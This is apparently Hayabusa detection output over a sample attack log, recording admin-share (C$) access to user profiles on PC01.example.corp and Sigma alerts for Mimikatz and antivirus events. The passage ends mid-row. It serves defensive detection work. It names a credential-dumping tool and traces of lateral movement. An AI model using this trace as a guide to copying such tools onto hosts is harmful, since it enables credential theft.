10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 